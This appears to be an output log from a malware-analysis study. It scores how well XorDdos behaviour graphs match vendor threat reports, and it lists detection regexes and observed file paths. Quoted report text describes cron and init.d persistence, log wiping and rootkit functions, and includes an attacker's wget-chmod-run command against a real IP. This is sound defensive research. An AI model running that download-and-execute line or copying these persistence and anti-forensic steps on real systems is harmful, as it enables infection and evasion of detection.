asg_object: ['.*/perl/.*', '.*/selinux', '/.*bin/insserv', '/.*bin/openrc', '/.*bin/sed', '/boot', '/boot/[a-z0-9]{10}', '/etc/cron\\..*/.*', '/etc/crontab', '/etc/init\\.d/.*', '/etc/rc.*\\.d/.*', '/etc/sed[0-9a-zA-Z]{6}', '/proc/\\d+/exe', '/proc/rs_dev', '/proc/self', '/proc/stat', '/proc/vz', '/run/systemd/.*', '/var', '/var/run', '/var/run/.*', '0x[0-9a-zA-Z]{1,16}', 'Permission', 'Permission:[0-9]{3}', '\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}', '\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}:\\d+', '^GID.*', '^PID.*', '^UID.*', '^chkconfig$', '^sed$', '^sh$', '^systemctl$', '^uname$', '^update-rc.d$', 'port \\d+']

Sample Xorddos-Cdnetworks.csv
	num of segment in report: 32, 0 of them contain ASG object(s)
	lenght of ctd's OPset is 0
	#numofSTobject: 0, numofSTobject sysRrc: 0
	#R_malObj
	num of ctd objects: 0, num of asg objects: 815. R_malObj is 0.0000
		ctd_object: []
	#R_malSysObj
	num of ctd objects: 0, num of asg objects: 14. R_malSysObj is 0.0000
		len(asg_OPset): 87, len(ctd_OPset): 0
	#R_malOps
	num of matched asg op: 0, num of asg op: 7469. R_malOps is 0.0000
		refered lifecycle: []
	#R_malChangeOps
	num of matched asg op: 0, num of asg op: 77. R_malChangeOps is 0.0000
		ref-sys lifecycle: []

Sample Xorddos-Crowdstrike.csv
	num of segment in report: 49, 0 of them contain ASG object(s)
	lenght of ctd's OPset is 0
	#numofSTobject: 0, numofSTobject sysRrc: 0
	#R_malObj
	num of ctd objects: 0, num of asg objects: 815. R_malObj is 0.0000
		ctd_object: []
	#R_malSysObj
	num of ctd objects: 0, num of asg objects: 14. R_malSysObj is 0.0000
		len(asg_OPset): 87, len(ctd_OPset): 0
	#R_malOps
	num of matched asg op: 0, num of asg op: 7469. R_malOps is 0.0000
		refered lifecycle: []
	#R_malChangeOps
	num of matched asg op: 0, num of asg op: 77. R_malChangeOps is 0.0000
		ref-sys lifecycle: []

Sample Xorddos-Intezer.csv
	num of segment in report: 160, 7 of them contain ASG object(s)
	lenght of ctd's OPset is 10
	#numofSTobject: 5, numofSTobject sysRrc: 3
	#R_malObj
	num of ctd objects: 23, num of asg objects: 815. R_malObj is 0.0282
		ctd_object: ['/etc/init\\.d/.*', '/etc/rc.*\\.d/.*', '0x[0-9a-zA-Z]{1,16}', 'Permission', '\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}', '^GID.*', '^UID.*']
	#R_malSysObj
	num of ctd objects: 11, num of asg objects: 14. R_malSysObj is 0.7857
		len(asg_OPset): 87, len(ctd_OPset): 10
	#R_malOps
	num of matched asg op: 901, num of asg op: 7469. R_malOps is 0.1206
		refered lifecycle: [2, 3, 4, 18, 19, 32, 37, 80]
	#R_malChangeOps
	num of matched asg op: 0, num of asg op: 77. R_malChangeOps is 0.0000
		ref-sys lifecycle: []

	hits
	<OP 3 act=set_thread_area(), obj=0x[0-9a-zA-Z]{1,16} (mem)>, <OP 8 act=be, obj=0x18, sent=  0x8 Content-Length as long  0x10 Total-Length as long  0x18 Response body  The content length is the length of the response body but also used as the key>
	<OP 4 act=set_tid_address(), obj=0x[0-9a-zA-Z]{1,16} (mem)>, <OP 8 act=be, obj=0x18, sent=  0x8 Content-Length as long  0x10 Total-Length as long  0x18 Response body  The content length is the length of the response body but also used as the key>
	<OP 5 act=set_robust_list(), obj=0x[0-9a-zA-Z]{1,16} (mem)>, <OP 8 act=be, obj=0x18, sent=  0x8 Content-Length as long  0x10 Total-Length as long  0x18 Response body  The content length is the length of the response body but also used as the key>
	<OP19 act=shmat(), obj=0x[0-9a-zA-Z]{1,16} (mem)>, <OP 6 act=add, obj=0x0, sent=The data is added to a struct with the following layout: 0x0 JSESSIONID as int>
	<OP20 act=open(), obj=/etc/init\.d/.*>, <OP 5 act=create, obj=/etc/init.d/po1kitd-update, sent=The following files are created after executing the malware on boot: /usr/syno/etc/rc.d/S99po1kitd-update.sh /etc/init.d/po1kitd-update /etc/rc2.d/S99po1kitd-update The malware checks if the rootkit is active by creating a file and removing it>
	<OP33 act=mprotect(), obj=0x[0-9a-zA-Z]{1,16} (mem)>, <OP 8 act=be, obj=0x18, sent=  0x8 Content-Length as long  0x10 Total-Length as long  0x18 Response body  The content length is the length of the response body but also used as the key>
	<OP38 act=arch_prctl(), obj=0x[0-9a-zA-Z]{1,16} (mem)>, <OP 8 act=be, obj=0x18, sent=  0x8 Content-Length as long  0x10 Total-Length as long  0x18 Response body  The content length is the length of the response body but also used as the key>
	<OP81 act=connect(), obj=ip_addr/ip_addr:port/port>, <OP 9 act=hardcode, obj=127.0.0.1, sent=Table 2: Data collected by the malware and sent back to the C2 server URL key	Description	Comment hostip	IP	Hardcoded to 127.0.0.1 softtype		Hardcoded to “Linux” pscaddr	MAC address	 hostname	Machine name	 hosttar	Username	Possibly “host target” hostos	Distribution	Extracted from /etc/issue or /etc/redhat-release hostcpu	Clock speed	/proc/cpuinfo hostmem	Amount of memory	/proc/meminfo hostpack		Hardcoded to “Linux” lkmtag	Is rootkit enabled	 kernel	Kernel version	Extracted from unameFigure 12 shows the communication between RedXOR and the C2>

Sample Xorddos-Ms.csv
	num of segment in report: 271, 40 of them contain ASG object(s)
	lenght of ctd's OPset is 51
	#numofSTobject: 62, numofSTobject sysRrc: 23
	#R_malObj
	num of ctd objects: 29, num of asg objects: 815. R_malObj is 0.0356
		ctd_object: ['/boot', '/etc/cron\\..*/.*', '/etc/crontab', '/etc/init\\.d/.*', '/etc/rc.*\\.d/.*', '/proc/rs_dev', '/proc/self', '/var', '/var/run', '/var/run/.*', '0x[0-9a-zA-Z]{1,16}', '^GID.*', '^PID.*', '^UID.*', '^chkconfig$', '^sh$', '^update-rc.d$']
	#R_malSysObj
	num of ctd objects: 13, num of asg objects: 14. R_malSysObj is 0.9286
		len(asg_OPset): 87, len(ctd_OPset): 51
	#R_malOps
	num of matched asg op: 963, num of asg op: 7469. R_malOps is 0.1289
		refered lifecycle: [6, 14, 18, 19, 21, 22, 24, 25, 26, 28, 35, 41, 42, 56, 66, 67, 68, 73, 74, 75, 84]
	#R_malChangeOps
	num of matched asg op: 64, num of asg op: 77. R_malChangeOps is 0.8312
		ref-sys lifecycle: [74, 73, 14, 24, 75, 21]

	hits
	<OP 7 act=readlink(), obj=/proc/self>, <OP30 act=call, obj=/proc/self/exe, sent=Before handling the argument-based control, it calls the readlink API with the first parameter as /proc/self/exe to fetch its full process path>
	<OP15 act=write(), obj=/boot>, <OP 3 act=contain, obj=/var/log/boot.log, sent=After running the ELF file, uses an anti-forensic technique that hides its past activity by overwriting the content of the following sensitive files with a newline character: Sensitive File	Description /root/.bash_history	Contains the commands that were run earlier /var/log/wtmp	Contains login related record for users /var/log/btmp	Contains record of failed login attempt /var/log/lastlog	Contains the recent login information for users /var/log/secure	Contains information related to security such as logs for authentication failure, sudo logins, and authorization privileges /var/log/boot.log	Contains information related to system boot and message logged via system startup processes /var/log/cron	Contains information related to cron job launch, success and failure error logs /var/log/dmesg	Contains information related to kernel ring buffer messages, hardware devices, drivers, etc>
	<OP19 act=shmat(), obj=0x[0-9a-zA-Z]{1,16} (mem)>, <OP43 act=send, obj=0x9748712, sent=If the Linux kernel module interface is up, XorDdos sends an IOCTL request with the unique identifier 0x9748712 with argument “0” to open two-way communication between the XorDdos binary and its rootkit>
	<OP20 act=open(), obj=/etc/init\.d/.*>, <OP35 act=perform, obj=/etc/init.d/<file_name>, sent=Additionally, it performs the following tasks on a provided $pid:  Fetches the process file name corresponding to the provided $pid Deletes the file for the provided $pid Deletes the installed init services: Deletes /etc/init.d/<file_name> For runlevels 1-5, unlinks and deletes /etc/rc<runlevel>.d/S90<file_name> Performs the command chkconfig –del <file_name> Performs the command update-rc.d <file_name> remove Ends the process that was provided as an argument>
	<OP22 act=write(), obj=/etc/init\.d/.*>, <OP25 act=run, obj=/etc/init.d/<base_file_name>, sent=Installation of rc.d directory’s symlink scripts with /etc/init.d/<base_file_name> Auto-start services  The malware runs a command to install startup services that automatically run XorDdos at boot>
	<OP23 act=open(), obj=/etc/cron\..*/.*>, <OP14 act=create, obj=/etc/cron.hourly/gcc.sh.The, sent= Cron script  The malware creates a cron script at the location /etc/cron.hourly/gcc.sh.The cron script passes parameters with the following content:  Screenshot of the contents of the gcc.sh script>
	<OP25 act=write(), obj=/etc/cron\..*/.*>, <OP16 act=run, obj=/etc/cron.hourly/gcc.sh, sent= It then creates a /etc/crontab file to run /etc/cron.hourly/gcc.sh every three minutes:  Screenshot displaying the system command to delete the /etc/cron.hourly/gcc.sh entry from /etc/crontab file and add a new entry>
	<OP26 act=open(), obj=/proc/rs_dev>, <OP11 act=have, obj=/proc/rs_dev, sent=In this case, the malware has a provision for communicating with its rootkit component /proc/rs_dev by sending input and output control (IOCTL) calls with additional information to take appropriate action>
	<OP27 act=rm(), obj=/etc/rc.*\.d/.*>, <OP36 act=delete, obj=/etc/rc<runlevel>.d/S90<file_name>, sent=Additionally, it performs the following tasks on a provided $pid:  Fetches the process file name corresponding to the provided $pid Deletes the file for the provided $pid Deletes the installed init services: Deletes /etc/init.d/<file_name> For runlevels 1-5, unlinks and deletes /etc/rc<runlevel>.d/S90<file_name> Performs the command chkconfig –del <file_name> Performs the command update-rc.d <file_name> remove Ends the process that was provided as an argument>
	<OP29 act=clone(), obj=^sh$>, <OP38 act=find, obj=sh, sent= The fake commands can include:  cat resolv.conf netstat -an bash whoami id cd /etc ifconfig eth0 ifconfig echo “find” uptime sh top gnome-terminal su netstat -antop grep “A” who ls -la pwd route -n ps -ef ls sleep 1>
	<OP36 act=clone(), obj=^chkconfig$>, <OP28 act=install, obj=chkconfig, sent=Screenshot displaying chkconfig and update-rc.d commands installing the startup service Figure 16. chkconfig and update-rc.d commands install the startup service Argument-based code-flow XorDdos has specific code paths corresponding to the number of arguments provided to the program>
	<OP42 act=getgid(), obj=^GID.*>, <OP 9 act=assign, obj=GID, sent= The following table describes the symbols found in the rootkit and their corresponding functionalities:  Function name  	Description   give_root  	Provides a root privilege by setting a new set of credentials and assigning its UID, GID to “0” module_hide	Hides the rootkit kernel module module_show	Unhides the rootkit kernel module get_udp_seq_show	Hides the UDP4 connection by hooking /proc/net/udpHides the UDP6 connection by hooking /proc/net/udp6 get_tcp_seq_show	Hides the TCP4 connection by hooking /proc/net/tcpHides the TCP6 connection by hooking /proc/net/tcp6 hide_udp4_port	Adds a provided port to a list of hidden UDP4 ports unhide_udp4_port	Deletes a provided port from a list of hidden UDP4 ports hide_udp6_port	Adds a provided port to a list of hidden UDP6 ports unhide_udp6_port	Deletes a provided port from a list of hidden UDP6 ports hide_tcp4_port	Adds a provided port to a list of hidden TCP4 ports unhide_tcp4_port	Deletes a provided port from a list of hidden TCP4 ports hide_tcp6_port	Adds a provided port to a list of hidden TCP6 ports unhide_tcp6_port	Deletes a provided port from a list of hidden TCP6 ports unhide_allz	Iterates list of all hidden ports and deletes all entries firewall_acceptip	Adds an IP address provided to accept_ips list unfirewall_acceptip	Deletes a provided entry from accept_ips list firewall_dropip	Adds a provided IP address to drop_ips list unfirewall_dropip	Deletes a provided IP address to drop_ips list hide_proc	Adds a provided entry to hidden_procs list unhide_proc	Deletes a provided entry to hidden_procs list>
	<OP43 act=getegid(), obj=^GID.*>, <OP 9 act=assign, obj=GID, sent= The following table describes the symbols found in the rootkit and their corresponding functionalities:  Function name  	Description   give_root  	Provides a root privilege by setting a new set of credentials and assigning its UID, GID to “0” module_hide	Hides the rootkit kernel module module_show	Unhides the rootkit kernel module get_udp_seq_show	Hides the UDP4 connection by hooking /proc/net/udpHides the UDP6 connection by hooking /proc/net/udp6 get_tcp_seq_show	Hides the TCP4 connection by hooking /proc/net/tcpHides the TCP6 connection by hooking /proc/net/tcp6 hide_udp4_port	Adds a provided port to a list of hidden UDP4 ports unhide_udp4_port	Deletes a provided port from a list of hidden UDP4 ports hide_udp6_port	Adds a provided port to a list of hidden UDP6 ports unhide_udp6_port	Deletes a provided port from a list of hidden UDP6 ports hide_tcp4_port	Adds a provided port to a list of hidden TCP4 ports unhide_tcp4_port	Deletes a provided port from a list of hidden TCP4 ports hide_tcp6_port	Adds a provided port to a list of hidden TCP6 ports unhide_tcp6_port	Deletes a provided port from a list of hidden TCP6 ports unhide_allz	Iterates list of all hidden ports and deletes all entries firewall_acceptip	Adds an IP address provided to accept_ips list unfirewall_acceptip	Deletes a provided entry from accept_ips list firewall_dropip	Adds a provided IP address to drop_ips list unfirewall_dropip	Deletes a provided IP address to drop_ips list hide_proc	Adds a provided entry to hidden_procs list unhide_proc	Deletes a provided entry to hidden_procs list>
	<OP57 act=open(), obj=/etc/crontab>, <OP15 act=create, obj=/etc/crontab, sent= It then creates a /etc/crontab file to run /etc/cron.hourly/gcc.sh every three minutes:  Screenshot displaying the system command to delete the /etc/cron.hourly/gcc.sh entry from /etc/crontab file and add a new entry>
	<OP67 act=open(), obj=/var>, <OP31 act=create, obj=/var/run/, sent=If it’s not running from these locations, then it creates and copies itself using a 10-character string name on those locations, as well as /lib/ and /var/run/>
	<OP68 act=open(), obj=/var/run>, <OP32 act=create, obj=/var/run/, sent=If it’s not running from these locations, then it creates and copies itself using a 10-character string name on those locations, as well as /lib/ and /var/run/>
	<OP69 act=open(), obj=/var/run/.*>, <OP33 act=create, obj=/var/run/, sent=If it’s not running from these locations, then it creates and copies itself using a 10-character string name on those locations, as well as /lib/ and /var/run/>
	<OP74 act=write(), obj=/var>, <OP 1 act=run, obj=/var/log/wtmp, sent=After running the ELF file, uses an anti-forensic technique that hides its past activity by overwriting the content of the following sensitive files with a newline character: Sensitive File	Description /root/.bash_history	Contains the commands that were run earlier /var/log/wtmp	Contains login related record for users /var/log/btmp	Contains record of failed login attempt /var/log/lastlog	Contains the recent login information for users /var/log/secure	Contains information related to security such as logs for authentication failure, sudo logins, and authorization privileges /var/log/boot.log	Contains information related to system boot and message logged via system startup processes /var/log/cron	Contains information related to cron job launch, success and failure error logs /var/log/dmesg	Contains information related to kernel ring buffer messages, hardware devices, drivers, etc>
	<OP75 act=write(), obj=/var/run>, <OP45 act=encrypt, obj=/var/run/gcc.pid, sent=  kill_process  The kill_process thread performs the following tasks:  Decodes encrypted strings Fetches file stats for /var/run/gcc.pid or, if none exist, then creates the file Fetches file stats for /lib/libudev.so or, if none exist, then creates the directory /lib and creates a copy of itself at the location /lib/libudev.so Fetches the on disk file information associated with the current process; if it fails, then exits the loop and stops the current process Reads the content from kill_cfg and performs the corresponding actions, like stopping the process or deleting files, based on the matching specified keys in the configuration file, such as: md5= filename= rmfile= denyip= tcp_thread  The tcp_thread triggers the connection with the C2 server decoded earlier using decrypt_remotestr()>
	<OP76 act=write(), obj=/var/run/.*>, <OP46 act=encrypt, obj=/var/run/gcc.pid, sent=  kill_process  The kill_process thread performs the following tasks:  Decodes encrypted strings Fetches file stats for /var/run/gcc.pid or, if none exist, then creates the file Fetches file stats for /lib/libudev.so or, if none exist, then creates the directory /lib and creates a copy of itself at the location /lib/libudev.so Fetches the on disk file information associated with the current process; if it fails, then exits the loop and stops the current process Reads the content from kill_cfg and performs the corresponding actions, like stopping the process or deleting files, based on the matching specified keys in the configuration file, such as: md5= filename= rmfile= denyip= tcp_thread  The tcp_thread triggers the connection with the C2 server decoded earlier using decrypt_remotestr()>
	<OP85 act=mremap(), obj=0x[0-9a-zA-Z]{1,16} (mem)>, <OP39 act=decode, obj=0xBB2FA36AAA9541F0, sent= As mentioned in the XOR-based encryption section, the encoded string m7A4nQ_/nA translates to the folder path /usr/bin when decoded with the multi-byte key 0xBB2FA36AAA9541F0>

	sys_hits
	<OP15 act=write(), obj=/boot>, <OP 3 act=contain, obj=/var/log/boot.log, sent=After running the ELF file, uses an anti-forensic technique that hides its past activity by overwriting the content of the following sensitive files with a newline character: Sensitive File	Description /root/.bash_history	Contains the commands that were run earlier /var/log/wtmp	Contains login related record for users /var/log/btmp	Contains record of failed login attempt /var/log/lastlog	Contains the recent login information for users /var/log/secure	Contains information related to security such as logs for authentication failure, sudo logins, and authorization privileges /var/log/boot.log	Contains information related to system boot and message logged via system startup processes /var/log/cron	Contains information related to cron job launch, success and failure error logs /var/log/dmesg	Contains information related to kernel ring buffer messages, hardware devices, drivers, etc>
	<OP22 act=write(), obj=/etc/init\.d/.*>, <OP25 act=run, obj=/etc/init.d/<base_file_name>, sent=Installation of rc.d directory’s symlink scripts with /etc/init.d/<base_file_name> Auto-start services  The malware runs a command to install startup services that automatically run XorDdos at boot>
	<OP25 act=write(), obj=/etc/cron\..*/.*>, <OP16 act=run, obj=/etc/cron.hourly/gcc.sh, sent= It then creates a /etc/crontab file to run /etc/cron.hourly/gcc.sh every three minutes:  Screenshot displaying the system command to delete the /etc/cron.hourly/gcc.sh entry from /etc/crontab file and add a new entry>
	<OP74 act=write(), obj=/var>, <OP 1 act=run, obj=/var/log/wtmp, sent=After running the ELF file, uses an anti-forensic technique that hides its past activity by overwriting the content of the following sensitive files with a newline character: Sensitive File	Description /root/.bash_history	Contains the commands that were run earlier /var/log/wtmp	Contains login related record for users /var/log/btmp	Contains record of failed login attempt /var/log/lastlog	Contains the recent login information for users /var/log/secure	Contains information related to security such as logs for authentication failure, sudo logins, and authorization privileges /var/log/boot.log	Contains information related to system boot and message logged via system startup processes /var/log/cron	Contains information related to cron job launch, success and failure error logs /var/log/dmesg	Contains information related to kernel ring buffer messages, hardware devices, drivers, etc>
	<OP75 act=write(), obj=/var/run>, <OP45 act=encrypt, obj=/var/run/gcc.pid, sent=  kill_process  The kill_process thread performs the following tasks:  Decodes encrypted strings Fetches file stats for /var/run/gcc.pid or, if none exist, then creates the file Fetches file stats for /lib/libudev.so or, if none exist, then creates the directory /lib and creates a copy of itself at the location /lib/libudev.so Fetches the on disk file information associated with the current process; if it fails, then exits the loop and stops the current process Reads the content from kill_cfg and performs the corresponding actions, like stopping the process or deleting files, based on the matching specified keys in the configuration file, such as: md5= filename= rmfile= denyip= tcp_thread  The tcp_thread triggers the connection with the C2 server decoded earlier using decrypt_remotestr()>
	<OP76 act=write(), obj=/var/run/.*>, <OP46 act=encrypt, obj=/var/run/gcc.pid, sent=  kill_process  The kill_process thread performs the following tasks:  Decodes encrypted strings Fetches file stats for /var/run/gcc.pid or, if none exist, then creates the file Fetches file stats for /lib/libudev.so or, if none exist, then creates the directory /lib and creates a copy of itself at the location /lib/libudev.so Fetches the on disk file information associated with the current process; if it fails, then exits the loop and stops the current process Reads the content from kill_cfg and performs the corresponding actions, like stopping the process or deleting files, based on the matching specified keys in the configuration file, such as: md5= filename= rmfile= denyip= tcp_thread  The tcp_thread triggers the connection with the C2 server decoded earlier using decrypt_remotestr()>

Sample Xorddos-Trendmicro.csv
	num of segment in report: 27, 4 of them contain ASG object(s)
	lenght of ctd's OPset is 8
	#numofSTobject: 6, numofSTobject sysRrc: 3
	#R_malObj
	num of ctd objects: 20, num of asg objects: 815. R_malObj is 0.0245
		ctd_object: ['/etc/cron\\..*/.*', '/etc/rc.*\\.d/.*', '/var', '/var/run', '/var/run/.*', 'Permission', '^PID.*']
	#R_malSysObj
	num of ctd objects: 11, num of asg objects: 14. R_malSysObj is 0.7857
		len(asg_OPset): 87, len(ctd_OPset): 8
	#R_malOps
	num of matched asg op: 5, num of asg op: 7469. R_malOps is 0.0007
		refered lifecycle: [22, 50, 51]
	#R_malChangeOps
	num of matched asg op: 0, num of asg op: 77. R_malChangeOps is 0.0000
		ref-sys lifecycle: []

	hits
	<OP23 act=open(), obj=/etc/cron\..*/.*>, <OP 2 act=drop, obj=/etc/cron.hourly/gcc.sh, sent= This Backdoor drops the following files:  /etc/cron.hourly/gcc.sh (Cron is a time-based job scheduler in Unix-like computer operating systems) Backdoor Routine>
	<OP51 act=getpid(), obj=^PID.*>, <OP 3 act=gather, obj=PID, sent= Information Theft  This Backdoor gathers the following data:  Memory Information CPU Information Network Speed PID of Running Process MD5 of Running Process Other Details>
	<OP52 act=getppid(), obj=^PID.*>, <OP 3 act=gather, obj=PID, sent= Information Theft  This Backdoor gathers the following data:  Memory Information CPU Information Network Speed PID of Running Process MD5 of Running Process Other Details>

Sample Xorddos-Trendmicro2.csv
	num of segment in report: 52, 4 of them contain ASG object(s)
	lenght of ctd's OPset is 7
	#numofSTobject: 2, numofSTobject sysRrc: 0
	#R_malObj
	num of ctd objects: 18, num of asg objects: 815. R_malObj is 0.0221
		ctd_object: ['\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}', '\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}:\\d+', '^PID.*']
	#R_malSysObj
	num of ctd objects: 0, num of asg objects: 14. R_malSysObj is 0.0000
		len(asg_OPset): 87, len(ctd_OPset): 7
	#R_malOps
	num of matched asg op: 4, num of asg op: 7469. R_malOps is 0.0005
		refered lifecycle: [76, 77]
	#R_malChangeOps
	num of matched asg op: 0, num of asg op: 77. R_malChangeOps is 0.0000
		ref-sys lifecycle: []

	hits
	<OP77 act=send(), obj=ip_addr/ip_addr:port/port>, <OP 1 act=wget, obj=http://122.51.133.49:10086/VIP, sent=Afterwards, the attackers executed the following sequence of commands to all containers, infecting all of them with the XORDDoS malware:  wget http://122.51.133.49:10086/VIP –O VIP chmod 777 VIP ./VIP The XORDDoS payload (detected by Trend Micro as Backdoor.Linux.XORDDOS.AE) still used the XOR-key it used in other recorded attacks, BB2FA36AAA9541F0, to encrypt its strings and to communicate with the command and control (C&C) server>
	<OP78 act=send(), obj=ip_addr/ip_addr:port/port>, <OP 2 act=wget, obj=http://122.51.133.49:10086/VIP, sent=Afterwards, the attackers executed the following sequence of commands to all containers, infecting all of them with the XORDDoS malware:  wget http://122.51.133.49:10086/VIP –O VIP chmod 777 VIP ./VIP The XORDDoS payload (detected by Trend Micro as Backdoor.Linux.XORDDOS.AE) still used the XOR-key it used in other recorded attacks, BB2FA36AAA9541F0, to encrypt its strings and to communicate with the command and control (C&C) server>


OperationPair that changes system resources:
[<OP75 act=write(), obj=/var/run>, <OP74 act=write(), obj=/var>, <OP28 act=write(), obj=/etc/rc.*\.d/.*>, <OP62 act=write(), obj=/etc/sed[0-9a-zA-Z]{6}>, <OP15 act=write(), obj=/boot>, <OP25 act=write(), obj=/etc/cron\..*/.*>, <OP64 act=fchmod(), obj=/etc/sed[0-9a-zA-Z]{6}>, <OP16 act=write(), obj=/boot/[a-z0-9]{10}>, <OP76 act=write(), obj=/var/run/.*>, <OP22 act=write(), obj=/etc/init\.d/.*>, <OP65 act=rename(), obj=/etc/crontab>]

{
    ".*/perl/.*": [
        "/etc/perl/File/Glob.pm",
        "/etc/perl/File/Glob.pmc",
        "/etc/perl/XSLoader.pm",
        "/etc/perl/XSLoader.pmc",
        "/etc/perl/strict.pm",
        "/etc/perl/strict.pmc",
        "/etc/perl/warnings.pm",
        "/etc/perl/warnings.pmc",
        "/usr/local/share/perl/5.26.0",
        "/usr/local/share/perl/5.26.1/File/Glob.pm",
        "/usr/local/share/perl/5.26.1/File/Glob.pmc",
        "/usr/local/share/perl/5.26.1/XSLoader.pm",
        "/usr/local/share/perl/5.26.1/XSLoader.pmc",
        "/usr/local/share/perl/5.26.1/strict.pm",
        "/usr/local/share/perl/5.26.1/strict.pmc",
        "/usr/local/share/perl/5.26.1/warnings.pm",
        "/usr/local/share/perl/5.26.1/warnings.pmc",
        "/usr/share/perl/5.26/XSLoader.pm",
        "/usr/share/perl/5.26/XSLoader.pmc",
        "/usr/share/perl/5.26/strict.pm",
        "/usr/share/perl/5.26/strict.pmc",
        "/usr/share/perl/5.26/warnings.pm",
        "/usr/share/perl/5.26/warnings.pmc",
        "/usr/share/perl5/File/Glob.pm",
        "/usr/share/perl5/File/Glob.pmc",
        "/usr/share/perl5/XSLoader.pm",
        "/usr/share/perl5/XSLoader.pmc",
        "/usr/share/perl5/strict.pm",
        "/usr/share/perl5/strict.pmc",
        "/usr/share/perl5/warnings.pm",
        "/usr/share/perl5/warnings.pmc"
    ],
    ".*/selinux": [
        "/etc/selinux/config",
        "/selinux",
        "/sys/fs/selinux"
    ],
    "/.*bin/insserv": [
        "/sbin/insserv"
    ],
    "/.*bin/openrc": [
        "/sbin/openrc"
    ],
    "/.*bin/sed": [
        "/bin/sed"
    ],
    "/boot": [
        "/boot"
    ],
    "/boot/[a-z0-9]{10}": [
        "/boot/auqrvglpdz",
        "/boot/awroivjpkx",
        "/boot/bkrlffbdxs",
        "/boot/bsthdzgvmt",
        "/boot/bsuztxmack",
        "/boot/bthcxsfqan",
        "/boot/btiipgrbod",
        "/boot/bxzcujmwuj",
        "/boot/culylmxbnn",
        "/boot/cuzvqbtvfd",
        "/boot/dczbbqscrr",
        "/boot/devawlqrit",
        "/boot/dgbfmcdgie",
        "/boot/eirlnrbbue",
        "/boot/fgqxqatvys",
        "/boot/frdsmulhvu",
        "/boot/ftrnncnlir",
        "/boot/fykepenmvn",
        "/boot/fzmicupinj",
        "/boot/gvqambdbei",
        "/boot/gzouwclwnr",
        "/boot/hbzgcgpgrl",
        "/boot/hlgpkoezsl",
        "/boot/hucenabudx",
        "/boot/iphpevdezt",
        "/boot/iswqwsprgu",
        "/boot/ixfnusqrgg",
        "/boot/jpyqhyfzey",
        "/boot/kfiegjyafw",
        "/boot/kfsglskbdb",
        "/boot/kkxlhyzfmp",
        "/boot/ksatflruxo",
        "/boot/ksxexbvwow",
        "/boot/kyjfilcrnq",
        "/boot/lgwpwkxyat",
        "/boot/ljmsrriafj",
        "/boot/lwhpfsdftn",
        "/boot/lwiovnycak",
        "/boot/lxwrjfjxtp",
        "/boot/lydfnrjaxp",
        "/boot/mfpmkpexoo",
        "/boot/mmyypjufxq",
        "/boot/nkoyupuxpx",
        "/boot/ogyujgrviy",
        "/boot/pxqgyrrbzu",
        "/boot/pyaqircmpc",
        "/boot/pydamssrzt",
        "/boot/pzjfoxtpmb",
        "/boot/qizzmavgpl",
        "/boot/qnztnkzxje",
        "/boot/qrwzvycybx",
        "/boot/rjvpbnmhxl",
        "/boot/rsztkcqmag",
        "/boot/surblktlmj",
        "/boot/tljpweugni",
        "/boot/vxcezwunnx",
        "/boot/xcyyuwgxmx",
        "/boot/yekbvdwwsw",
        "/boot/yterrxdnqm",
        "/boot/zdmysrquou",
        "/boot/zqghiflwfw"
    ],
    "/etc/cron\\..*/.*": [
        "/etc/cron.hourly/cron.sh"
    ],
    "/etc/crontab": [
        "/etc/crontab"
    ],
    "/etc/init\\.d/.*": [
        "/etc/init.d/kyjfilcrnq"
    ],
    "/etc/rc.*\\.d/.*": [
        "/etc/rc.d/rc1.d/S90kyjfilcrnq",
        "/etc/rc.d/rc2.d/S90kyjfilcrnq",
        "/etc/rc.d/rc3.d/S90kyjfilcrnq",
        "/etc/rc.d/rc4.d/S90kyjfilcrnq",
        "/etc/rc.d/rc5.d/S90kyjfilcrnq",
        "/etc/rc1.d/S90kyjfilcrnq",
        "/etc/rc2.d/S90kyjfilcrnq",
        "/etc/rc3.d/S90kyjfilcrnq",
        "/etc/rc4.d/S90kyjfilcrnq",
        "/etc/rc5.d/S90kyjfilcrnq"
    ],
    "/etc/sed[0-9a-zA-Z]{6}": [
        "/etc/sed6bJvhB"
    ],
    "/proc/\\d+/exe": [
        "/proc/1521/exe"
    ],
    "/proc/rs_dev": [
        "/proc/rs_dev"
    ],
    "/proc/self": [
        "/proc/self/exe"
    ],
    "/proc/stat": [
        "/proc/stat"
    ],
    "/proc/vz": [
        "/proc/vz"
    ],
    "/run/systemd/.*": [
        "/run/systemd/system"
    ],
    "/var": [
        "/var"
    ],
    "/var/run": [
        "/var/run"
    ],
    "/var/run/.*": [
        "/var/run/sftp.pid"
    ]
}